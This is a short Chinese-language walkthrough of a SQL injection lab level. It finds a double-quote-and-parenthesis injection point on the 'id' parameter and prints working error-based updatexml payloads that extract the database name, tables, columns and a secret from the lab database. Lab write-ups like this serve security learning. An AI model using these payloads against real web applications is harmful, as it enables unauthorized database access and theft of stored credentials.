这一关还是一如既往的5次机会 一如既往的是以id作为注入点的 我们还是按照先前的做法第一轮先去获取一下注入类型以及决定下一轮要使用的注入方法 第二轮在进行各种爆破操作
首先输入id=1 and 1=2判断注入类型是否属于数字型 回显如下 属于字符型
然后输入1' 回显如下 说明不属于单引号注入类型
再试试看双引号 输入1" 看看回显 这一个层面说明我们下一轮可以使用报错注入进行爆破操作 一个层面可以说明注入类型为双引号并且带有一个括号
佐证一下呗 输入1")--+ 正确回显了
把第一轮的最后一次机会浪费掉 重启一轮
首先进行爆库操作 输入如下
id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)--+
回显如下
接着进行爆表操作 输入如下
id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
回显如下
接着进行爆字段操作 输入如下
id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='dwc1xn8qcc'),0x7e),1)--+
回显如下
最后进行爆用户名和密码操作 输入如下
id=1") and updatexml(1,concat(0x7e,(select group_concat(sessid,'-',secret_89DM) from dwc1xn8qcc),0x7e),1)--+
回显如下
用通关成功了 嗨嗨!!